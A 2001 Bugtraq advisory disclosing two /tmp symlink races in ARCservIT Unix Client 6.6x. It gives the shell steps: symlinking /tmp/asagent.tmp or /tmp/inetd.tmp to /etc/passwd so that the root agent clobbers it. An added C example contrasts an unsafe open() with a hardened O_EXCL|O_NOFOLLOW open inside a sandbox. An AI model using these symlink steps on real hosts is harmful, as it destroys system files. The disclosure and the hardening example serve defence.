[20704] in bugtraq
tmp-races in ARCservIT Unix Client
daemon@ATHENA.MIT.EDU (Jonas Eriksson)
Fri May 18 11:01:26 2001
Date: Fri, 18 May 2001 11:10:31 +0200 (CEST)
From: Jonas Eriksson <je@sekure.net>
To: bugtraq@securityfocus.com
Message-ID: <Pine.BSO.4.21.0105181031380.1118-100000@birdie.sekure.net>
Hi,
Computer Associates ARCservIT Client version 6.6x has at least two /tmp
races, as follows:
Vulnerability #1
-----------------
This tmp-race only works if the asagent client has never been executed
before.
As user:
je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp
And root:
root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u
ARCserveIT Universal Agent started...
Then,
je@boxname~> ls -la /etc/passwd
-r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd
Vulnerability #2
-----------------
As user:
je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp
And root:
root@boxname# /usr/CYEagent/asagent inet add
Then,
je@boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent
Computer Associates has been informed.
Regards
Jonas Eriksson
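
The following is an added example, not part of the original post and not Computer Associates' code: it contrasts the file-open pattern that would produce the truncated /etc/passwd shown under Vulnerability #1 with a hardened open that refuses a pre-existing symlink. How the agent actually opens /tmp/asagent.tmp is an assumption, the function names are hypothetical, and everything runs inside a private mkdtemp() directory against a constructed victim file.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed vulnerable pattern: follows a pre-planted symlink and truncates its target. */
static int open_tmp_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened: O_EXCL makes open() fail with EEXIST if the name already exists,
 * symlinks included; O_NOFOLLOW is kept as defence in depth. */
static int open_tmp_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Builds a private sandbox with a constructed "victim" file and a symlink to it
 * named asagent.tmp, runs one opener as the daemon would, and returns the
 * victim's size afterwards (0 = clobbered, 12 = intact, -1 = setup error). */
long victim_size_after(int hardened) {
    char dir[] = "/tmp/tmprace-demo-XXXXXX", victim[64], tmp[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/asagent.tmp", dir);

    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs("root:x:0:0:\n", f);            /* 12 bytes of constructed content */
    fclose(f);
    if (symlink(victim, tmp) != 0) return -1;

    int fd = hardened ? open_tmp_safe(tmp) : open_tmp_unsafe(tmp);
    if (fd >= 0) close(fd);
    else if (hardened) fprintf(stderr, "refused: errno=%d (EEXIST=%d)\n", errno, EEXIST);

    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(tmp); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    printf("unsafe open -> victim is %ld bytes\n", victim_size_after(0));
    printf("safe open   -> victim is %ld bytes\n", victim_size_after(1));
    return 0;
}
```

A privileged daemon that needs scratch files is better served by mkstemp() or a root-owned directory that unprivileged users cannot write to, so the file name cannot be claimed in advance.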